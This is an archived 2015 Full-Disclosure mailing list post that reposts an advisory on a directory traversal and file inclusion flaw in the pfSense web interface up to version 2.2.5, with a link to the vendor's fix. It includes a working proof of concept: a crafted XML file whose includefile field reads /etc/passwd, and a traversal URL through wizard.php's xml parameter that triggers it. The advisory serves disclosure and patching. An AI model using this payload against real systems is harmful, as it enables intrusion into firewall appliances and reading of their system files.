lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 18 Dec 2015 22:09:31 +0100
From: Bacon Zombie <baconzombie@...il.com>
To: Rio Sherri <rio.sherri@...nstudent.info>
Cc: fulldisclosure <fulldisclosure@...lists.org>
Subject: Re: [FD] PFSense <= 2.2.5 Directory Traversal

For the lazy;
# Title : PFSense  <= 2.2.5 Directory Traversal
# Date : 18/12/2015
# Author : R-73eN
# Tested on : PFSense 2.2.5
# Software : https://github.com/pfsense/pfsense
# Vendor : https://pfsense.org/
#  ___        __        ____                 _    _
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
#
# Fix provided by the vendor
https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13
#
#

In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered
the following vulnerabilities in the pfsense Webgui.

The following files are vulnerable to a file inclusion attack

wizard.php?xml=
pkg.php?xml=

Both of this files do not sanitize the path of the xml parameter and we can
load xml files, and loading a special crafted xml file we can gain command
execution.

Example:
1.xml (the filename can be whatever .txt , .jpg etc because it does not
check for the file extension)

The content of the 1.xml should be:

<?xml version="1.0" encoding="utf-8" ?>
<pfsensewizard>
<totalsteps>12</totalsteps>
<step>
<id>1</id>
<title>LFI example </title>
<description>Lfi example </description>
<disableheader>on</disableheader>
<stepsubmitphpaction>step1_submitphpaction();</stepsubmitphpaction>
<includefile>/etc/passwd</includefile>
</step>
</pfsensewizard>

the parameter <includefile> is passed to a require_once() function which
triggers the File inclusion Attack.
As we all know File inclusion attack can be converted to  RCE  very easily.

Then visiting

http://vulnhost/wizard.php?xml=../../../1.xml

where the "xml" parameter is the path of the crafted file, will trigger the
vulnerability.

Thanks
Rio Sherri
https://www.infogen.al/ - Infogen AL
On Dec 18, 2015 6:27 PM, "Rio Sherri" <rio.sherri@...nstudent.info> wrote:

>
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists